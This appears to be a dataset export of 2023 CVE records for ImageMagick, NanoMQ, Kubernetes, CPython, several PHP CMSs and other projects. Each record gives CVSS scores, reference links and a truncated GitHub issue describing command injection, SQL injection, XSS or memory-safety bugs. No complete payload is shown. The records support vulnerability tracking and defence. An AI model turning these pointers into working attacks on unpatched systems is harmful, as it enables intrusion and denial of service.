https://github.com/nanomq/nanomq/issues/1165
1,668,648,319
1,165
CVE-2023-34151
2023-05-30T22:15:11.000
A vulnerability was found in ImageMagick. This security flaw ouccers as an undefined behaviors of casting double to size_t in svg, mvg and other coders (recurring bugs of CVE-2022-32546).
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2023-34151" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "D8F0FD9E-E120-4BAB-A5C9-776077B47603", "versionEndExcluding": "7.1.1-11", "versionEndIncluding": null, "versionS...
[ "190" ]
190
https://github.com/ImageMagick/ImageMagick/issues/6341
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### ImageMagick version 7.1.30-0 ### Operating system Linux ### Operating system, version and so on Any ### Description While reviewing historical vulnerabilities, I discovered several similar bugs just like issue #4985 which was later assigned CVE-2022-32546. The original vulnerability relates ...
Undefined behaviors of casting `double` to `size_t` in svg, mvg and other coders (recurring bugs of CVE-2022-32546)
https://api.github.com/repos/ImageMagick/ImageMagick/issues/6341/comments
32
2023-05-17T11:25:22Z
2024-05-13T17:50:37Z
https://github.com/ImageMagick/ImageMagick/issues/6341
1,713,682,055
6,341
CVE-2023-34152
2023-05-30T22:15:11.070
A vulnerability was found in ImageMagick. This security flaw cause a remote code execution vulnerability in OpenBlob with --enable-pipes configured.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2023-34152" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "D8F0FD9E-E120-4BAB-A5C9-776077B47603", "versionEndExcluding": "7.1.1-11", "versionEndIncluding": null, "versionS...
[ "78" ]
78
https://github.com/ImageMagick/ImageMagick/issues/6339
[ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### ImageMagick version 6.9.6-4 ### Operating system Linux ### Operating system, version and so on Any ### Description While reviewing historical vulnerabilities, I discovered an aribitary code execution vulnerability (shell command injection) in `OpenBlob`, which is actually an incomplete fix to C...
RCE (shell command injection) vulnerability in `OpenBlob` with `--enable-pipes` configured
https://api.github.com/repos/ImageMagick/ImageMagick/issues/6339/comments
11
2023-05-17T09:47:04Z
2024-11-08T13:49:11Z
https://github.com/ImageMagick/ImageMagick/issues/6339
1,713,528,731
6,339
CVE-2023-34153
2023-05-30T22:15:11.143
A vulnerability was found in ImageMagick. This security flaw causes a shell command injection vulnerability via video:vsync or video:pixel-format options in VIDEO encoding/decoding.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrit...
[ { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2023-34153" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2210660" }, ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "D8F0FD9E-E120-4BAB-A5C9-776077B47603", "versionEndExcluding": "7.1.1-11", "versionEndIncluding": null, "versionS...
[ "77" ]
77
https://github.com/ImageMagick/ImageMagick/issues/6338
[ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### ImageMagick version 7.1.0-1 ### Operating system Linux ### Operating system, version and so on Any ### Description In reviewing historical vulnerabilities in ImageMagick, I discovered a shell command injection vulnerability in encoding/decoding VIDEO files, which very much resembles CVE-2020-29...
Shell command injection vulnerability via `video:vsync` or `video:pixel-format` options in VIDEO encoding/decoding.
https://api.github.com/repos/ImageMagick/ImageMagick/issues/6338/comments
2
2023-05-17T08:50:05Z
2024-01-23T11:25:13Z
https://github.com/ImageMagick/ImageMagick/issues/6338
1,713,432,787
6,338
CVE-2023-33659
2023-06-06T12:15:09.503
A heap buffer overflow vulnerability exists in NanoMQ 0.17.2. The vulnerability can be triggered by calling the function nmq_subinfo_decode() in the file mqtt_parser.c. An attacker could exploit this vulnerability to cause a denial of service attack.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/emqx/nanomq" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/emqx/nanomq/issues/1154" }, { "s...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:emqx:nanomq:0.17.2:*:*:*:*:*:*:*", "matchCriteriaId": "0898CABA-5930-437A-8300-4D91648091F1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding...
[ "787" ]
787
https://github.com/emqx/nanomq/issues/1154
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "emqx", "nanomq" ]
**Describe the bug** We (School of Cyber Science and Technology, Shandong University) found that NanoMQ can cause buffer overflow when it processes malformed SUBSCRIBE messages. This vulnerability is different from https://github.com/emqx/nanomq/issues/1153 **Expected behavior** If Asan is enabled at compile t...
heap-buffer-overflow2 in NanoMQ
https://api.github.com/repos/nanomq/nanomq/issues/1154/comments
2
2023-04-12T09:21:09Z
2023-04-19T06:43:53Z
https://github.com/nanomq/nanomq/issues/1154
1,664,179,606
1,154
CVE-2023-2878
2023-06-07T15:15:09.377
Kubernetes secrets-store-csi-driver in versions before 1.3.3 discloses service account tokens in logs.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integr...
[ { "source": "jordan@liggitt.net", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/kubernetes/kubernetes/issues/118419" }, { "source": "jordan@liggitt.net", "tags": [ "Mailing List" ], "url": "https://groups.google.com/g/kubernetes-security-an...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:secrets-store-csi-driver:*:*:*:*:*:*:*:*", "matchCriteriaId": "FE39B6E7-61B5-482B-953C-BA5441CD85C7", "versionEndExcluding": "1.3.3", "versionEndIncluding": null, ...
[ "532" ]
532
https://github.com/kubernetes/kubernetes/issues/118419
[ "Exploit", "Issue Tracking" ]
github.com
[ "kubernetes", "kubernetes" ]
A security issue was discovered in [secrets-store-csi-driver](https://github.com/kubernetes-sigs/secrets-store-csi-driver) where an actor with access to the driver logs could observe service account tokens. These tokens could then potentially be exchanged with external cloud providers to access secrets stored in cloud ...
CVE-2023-2878: secrets-store-csi-driver discloses service account tokens in logs
https://api.github.com/repos/kubernetes/kubernetes/issues/118419/comments
1
2023-06-02T19:03:54Z
2023-06-02T19:04:34Z
https://github.com/kubernetes/kubernetes/issues/118419
1,738,671,677
118,419
CVE-2023-33595
2023-06-07T20:15:09.920
CPython v3.12.0 alpha 7 was discovered to contain a heap use-after-free via the function ascii_decode at /Objects/unicodeobject.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/python/cpython/issues/103824" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/python/cpython/pull/103993/commits/c120bc2d354c...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:python:python:3.12.0:alpha7:*:*:*:*:*:*", "matchCriteriaId": "BA2D7BE3-5AEE-42DC-892C-747202C4A542", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartEx...
[ "416" ]
416
https://github.com/python/cpython/issues/103824
[ "Issue Tracking", "Vendor Advisory" ]
github.com
[ "python", "cpython" ]
# Your environment - CPython versions tested on: 3.12.0 alpha 7 - Operating system and architecture: ubuntu20.04.1,x86_64 - Compiler flags: clang with ASAN and UBSAN instrument # Bug description The AddressSanitizer (ASAN) tool has detected multiple heap-use-after-free errors and a segmentation fault (SEGV) in...
Found Heap-use-after-free errors and SEGV in Python
https://api.github.com/repos/python/cpython/issues/103824/comments
9
2023-04-25T03:35:53Z
2023-07-13T10:14:24Z
https://github.com/python/cpython/issues/103824
1,682,372,017
103,824
CVE-2023-33658
2023-06-08T12:15:09.240
A heap buffer overflow vulnerability exists in NanoMQ 0.17.2. The vulnerability can be triggered by calling the function nni_msg_get_pub_pid() in the file message.c. An attacker could exploit this vulnerability to cause a denial of service attack.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/emqx/nanomq" }, { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/emqx/nanomq/issues/1153" }, { "source": "cve@mitre.org", "tags": [ "Patch" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:emqx:nanomq:0.17.2:*:*:*:*:*:*:*", "matchCriteriaId": "0898CABA-5930-437A-8300-4D91648091F1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding...
[ "787" ]
787
https://github.com/emqx/nanomq/issues/1153
[ "Exploit" ]
github.com
[ "emqx", "nanomq" ]
**Describe the bug** We (School of Cyber Science and Technology, Shandong University) found that NanoMQ can cause buffer overflow when it processes malformed PUBLISH messages. **Expected behavior** If Asan is enabled at compile time, the NanoMQ crashes and displays ASAN information. ![image](https://user-image...
[Security]: Vulnerability that are unecessary to be fixed
https://api.github.com/repos/nanomq/nanomq/issues/1153/comments
0
2023-04-12T09:10:25Z
2023-04-15T07:37:26Z
https://github.com/nanomq/nanomq/issues/1153
1,664,162,150
1,153
CVE-2023-33660
2023-06-08T12:15:09.347
A heap buffer overflow vulnerability exists in NanoMQ 0.17.2. The vulnerability can be triggered by calling the function copyn_str() in the file mqtt_parser.c. An attacker could exploit this vulnerability to cause a denial of service attack.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/emqx/nanomq" }, { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/emqx/nanomq/issues/1155" }, { "source": "cve@mitre.org", "tags": [ "Patch" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:emqx:nanomq:0.17.2:*:*:*:*:*:*:*", "matchCriteriaId": "0898CABA-5930-437A-8300-4D91648091F1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding...
[ "787" ]
787
https://github.com/emqx/nanomq/issues/1155
[ "Exploit" ]
github.com
[ "emqx", "nanomq" ]
**Describe the bug** We (School of Cyber Science and Technology, Shandong University) found that NanoMQ can cause buffer overflow when it processes malformed messages. This vulnerability is different from https://github.com/emqx/nanomq/issues/1153 and https://github.com/emqx/nanomq/issues/1154 **Expected behavio...
heap-buffer-overflow3 in NanoMQ
https://api.github.com/repos/nanomq/nanomq/issues/1155/comments
3
2023-04-12T09:29:05Z
2023-04-14T10:11:32Z
https://github.com/nanomq/nanomq/issues/1155
1,664,192,034
1,155
CVE-2023-33657
2023-06-08T13:15:09.530
A use-after-free vulnerability exists in NanoMQ 0.17.2. The vulnerability can be triggered by calling the function nni_mqtt_msg_get_publish_property() in the file mqtt_msg.c. This vulnerability is caused by improper data tracing, and an attacker could exploit it to cause a denial of service attack.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/emqx/nanomq" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/emqx/nanomq/issues/1165#issue-1668648319" }, { "source": "cve@...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:emqx:nanomq:0.17.2:*:*:*:*:*:*:*", "matchCriteriaId": "0898CABA-5930-437A-8300-4D91648091F1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding...
[ "416" ]
416
https://github.com/emqx/nanomq/issues/1165#issue-1668648319
[ "Exploit", "Issue Tracking" ]
github.com
[ "emqx", "nanomq" ]
**Describe the bug** Our team (School of Cyber Science and Technology, Shandong University)have found the a potential issue in the current version of nanomq,it may cause heap-use-after-free when it handles the publish messages **Expected behavior** We use ASAN to compile the target server, and when we send a larg...
[Security]: wrong protocol name & data racing
https://api.github.com/repos/nanomq/nanomq/issues/1165/comments
13
2023-04-14T17:23:19Z
2023-04-25T10:06:34Z
https://github.com/nanomq/nanomq/issues/1165
1,668,648,319
1,165
CVE-2023-33557
2023-06-09T18:15:09.693
Fuel CMS v1.5.2 was discovered to contain a SQL injection vulnerability via the id parameter at /controllers/Blocks.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/bcvgh/fuel-cms-sqlinjection/blob/main/README.md" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url":...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thedaylightstudio:fuel_cms:1.5.2:*:*:*:*:*:*:*", "matchCriteriaId": "E3A44312-83D2-4421-9A35-3FD048EA578A", "versionEndExcluding": null, "versionEndIncluding": null, "version...
[ "89" ]
89
https://github.com/daylightstudio/FUEL-CMS/issues/604
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "daylightstudio", "FUEL-CMS" ]
login required. fuel/modules/fuel/controllers/Blocks.php line 64 import_view method starts Line 70 receives the id parameter of the post request and enters the import method ![image](https://github.com/daylightstudio/FUEL-CMS/assets/56790427/beda0025-4ba5-4d04-9ad3-f9b5712fdcc3) fuel/modules/fuel/librari...
FUEL CMS 1.5.2 allows SQL Injection via parameter 'id' in fuel/modules/fuel/controllers/Blocks.php
https://api.github.com/repos/daylightstudio/FUEL-CMS/issues/604/comments
2
2023-05-12T02:24:19Z
2023-05-12T15:50:17Z
https://github.com/daylightstudio/FUEL-CMS/issues/604
1,706,820,945
604
CVE-2023-33492
2023-06-12T13:15:10.300
EyouCMS 1.6.2 is vulnerable to Cross Site Scripting (XSS).
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/42" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.2:*:*:*:*:*:*:*", "matchCriteriaId": "5B87F220-D05C-4885-8C0E-E5BD8D8DFB66", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "79" ]
79
https://github.com/weng-xianhu/eyoucms/issues/42
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "weng-xianhu", "eyoucms" ]
EyouCMS v1.6.2 has a vulnerability that stores cross-site scripting ![image](https://user-images.githubusercontent.com/103560725/235909677-06807c10-1417-49ff-9b04-824e7cc1602d.png) ![image](https://user-images.githubusercontent.com/103560725/235909761-be021669-70f3-41e6-9337-7d04d805f0f8.png) ![image](https://user-i...
EyouCMS v1.6.2 has a vulnerability that stores cross-site scripting
https://api.github.com/repos/weng-xianhu/eyoucms/issues/42/comments
0
2023-05-03T12:02:15Z
2024-03-22T06:50:30Z
https://github.com/weng-xianhu/eyoucms/issues/42
1,693,938,455
42
CVE-2023-34488
2023-06-12T14:15:19.623
NanoMQ 0.17.5 is vulnerable to heap-buffer-overflow in the conn_handler function of mqtt_parser.c when it processes malformed messages.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrit...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://github.com/emqx/nanomq/issues/1181" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "P...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:emqx:nanomq:0.17.5:*:*:*:*:*:*:*", "matchCriteriaId": "49EF7B82-2B00-4EFB-8DC8-5B07806C106C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding...
[ "787" ]
787
https://github.com/emqx/nanomq/issues/1181
[ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ]
github.com
[ "emqx", "nanomq" ]
**Describe the bug** We found a heap-buffer-overflow in `conn_handler` function of `mqtt_parser.c` when it processes malformed messages. **Expected behavior** A clear and concise description of what you expected to happen. **Actual Behavior** Heap-buffer-overflow **To Reproduce** start nanomq with ./nano...
[Security]: Vulnerability identified
https://api.github.com/repos/nanomq/nanomq/issues/1181/comments
0
2023-04-18T16:29:38Z
2023-04-20T07:14:36Z
https://github.com/nanomq/nanomq/issues/1181
1,673,473,933
1,181
CVE-2023-34494
2023-06-12T14:15:19.690
NanoMQ 0.16.5 is vulnerable to heap-use-after-free in the nano_ctx_send function of nmq_mqtt.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://github.com/emqx/nanomq/issues/1180" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Vendor Advisory" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:emqx:nanomq:0.16.5:*:*:*:*:*:*:*", "matchCriteriaId": "E47A0176-434F-4B9F-9169-C6F0AC90780B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding...
[ "416" ]
416
https://github.com/emqx/nanomq/issues/1180
[ "Issue Tracking", "Patch", "Vendor Advisory" ]
github.com
[ "emqx", "nanomq" ]
**Describe the bug** We found a heap-use-after-free in `nano_ctx_send` function of `nmq_mqtt.c` when it processes malformed messages. **Actual Behavior** Heap-use-after-free **To Reproduce** Read the `pipe` in `nano_ctx_send`(nmq_mqtt.c) <img width="666" alt="image" src="https://user-images.githubusercontent...
[Security]: data contention in pipe reaper
https://api.github.com/repos/nanomq/nanomq/issues/1180/comments
4
2023-04-18T15:56:32Z
2023-05-18T03:03:09Z
https://github.com/nanomq/nanomq/issues/1180
1,673,423,197
1,180
CVE-2023-33695
2023-06-13T16:15:13.077
Hutool v5.8.17 and below was discovered to contain an information disclosure vulnerability via the File.createTempFile() function at /core/io/FileUtil.java.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrit...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory" ], "url": "https://github.com/dromara/hutool/issues/3103" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracki...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hutool:hutool:*:*:*:*:*:*:*:*", "matchCriteriaId": "C24D3772-507E-4835-B431-E55F9FB9EDD0", "versionEndExcluding": null, "versionEndIncluding": "5.8.17", "versionStartExcludin...
[ "732" ]
732
https://github.com/dromara/hutool/issues/3103
[ "Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory" ]
github.com
[ "dromara", "hutool" ]
There may has a temporary file information disclosure vulnerability by use File.createTempFile(). https://github.com/dromara/hutool/blob/89832cdcce8dc3b6bed0fc1d5bdd33e36d1e599f/hutool-core/src/main/java/cn/hutool/core/io/FileUtil.java#L1007 Preamble ----------------------------------------------------------------...
Temporary File Information Disclosure Vulnerability
https://api.github.com/repos/chinabugotech/hutool/issues/3103/comments
1
2023-05-15T06:30:47Z
2023-05-15T12:25:34Z
https://github.com/chinabugotech/hutool/issues/3103
1,709,406,655
3,103
CVE-2023-34867
2023-06-14T16:15:20.277
Jerryscript 3.0 (commit 05dbbd1) was discovered to contain an Assertion Failure via the ecma_property_hashmap_create at jerry-core/ecma/base/ecma-property-hashmap.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/5084" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://gi...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5", "versionEndExcluding": null, "versionEndIncluding": null, "versionSta...
[ "617" ]
617
https://github.com/jerryscript-project/jerryscript/issues/5084
[ "Exploit", "Issue Tracking" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision Commit: https://github.com/jerryscript-project/jerryscript/commit/05dbbd134c3b9e2482998f267857dd3722001cd7 Version: v3.0.0 ###### Build platform Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64) ###### Build steps ```sh python ./tools/build.py --clean --debug --compile-flag=-m32...
Assertion 'ECMA_PROPERTY_IS_PROPERTY_PAIR (prop_iter_p)' failed at ./jerryscript/jerry-core/ecma/base/ecma-property-hashmap.c(ecma_property_hashmap_create)
https://api.github.com/repos/jerryscript-project/jerryscript/issues/5084/comments
0
2023-06-05T11:59:55Z
2023-06-05T11:59:55Z
https://github.com/jerryscript-project/jerryscript/issues/5084
1,741,623,530
5,084
CVE-2023-34868
2023-06-14T16:15:20.323
Jerryscript 3.0 (commit 05dbbd1) was discovered to contain an Assertion Failure via the parser_parse_for_statement_start at jerry-core/parser/js/js-parser-statm.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/5083" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://gi...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5", "versionEndExcluding": null, "versionEndIncluding": null, "versionSta...
[ "617" ]
617
https://github.com/jerryscript-project/jerryscript/issues/5083
[ "Exploit", "Issue Tracking" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision Commit: https://github.com/jerryscript-project/jerryscript/commit/05dbbd134c3b9e2482998f267857dd3722001cd7 Version: v3.0.0 ###### Build platform Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64) ###### Build steps ```sh python ./tools/build.py --clean --debug --compile-flag=-m32...
Assertion 'context_p->token.type != LEXER_RIGHT_PAREN' failed at ./jerryscript/jerry-core/parser/js/js-parser-statm.c(parser_parse_for_statement_start)
https://api.github.com/repos/jerryscript-project/jerryscript/issues/5083/comments
0
2023-05-31T12:11:34Z
2023-05-31T12:11:34Z
https://github.com/jerryscript-project/jerryscript/issues/5083
1,734,082,739
5,083
CVE-2023-34626
2023-06-15T16:15:09.347
Piwigo 13.7.0 is vulnerable to SQL Injection via the "Users" function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/Piwigo/Piwigo/issues/1924" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisor...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:*", "matchCriteriaId": "B4B9AEE3-C9C5-4D20-BA38-9E5A2A64FABD", "versionEndExcluding": null, "versionEndIncluding": "13.7.0", "versionStartExcludin...
[ "89" ]
89
https://github.com/Piwigo/Piwigo/issues/1924
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "Piwigo", "Piwigo" ]
Access the 'Users' function and use the filter function ![image](https://github.com/Piwigo/Piwigo/assets/67749472/e2d503b5-096f-4528-97f1-8b9b015cc222) Observe the request on Burp Suite ![image](https://github.com/Piwigo/Piwigo/assets/67749472/7e4280b1-3b93-4c36-9bd3-a03aa1645555) Manipulate the 'order' or 'e...
SQL Injection in the "Users" function of piwigo
https://api.github.com/repos/Piwigo/Piwigo/issues/1924/comments
0
2023-05-25T07:54:09Z
2023-05-29T10:27:38Z
https://github.com/Piwigo/Piwigo/issues/1924
1,725,285,095
1,924
CVE-2023-2431
2023-06-16T08:15:08.770
A security issue was discovered in Kubelet that allows pods to bypass the seccomp profile enforcement. Pods that use localhost type for seccomp profile but specify an empty profile field, are affected by this issue. In this scenario, this vulnerability allows the pod to run in unconfined (seccomp disabled) mode. This b...
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 3.4, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityI...
[ { "source": "jordan@liggitt.net", "tags": [ "Issue Tracking" ], "url": "https://github.com/kubernetes/kubernetes/issues/118690" }, { "source": "jordan@liggitt.net", "tags": [ "Mailing List" ], "url": "https://groups.google.com/g/kubernetes-security-announce/c/QHmx0HOQ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "59A9CBF2-B94B-4311-AE41-6CEA2DA7E24B", "versionEndExcluding": "1.24.14", "versionEndIncluding": null, "versionStar...
[ "1287" ]
1287
https://github.com/kubernetes/kubernetes/issues/118690
[ "Issue Tracking" ]
github.com
[ "kubernetes", "kubernetes" ]
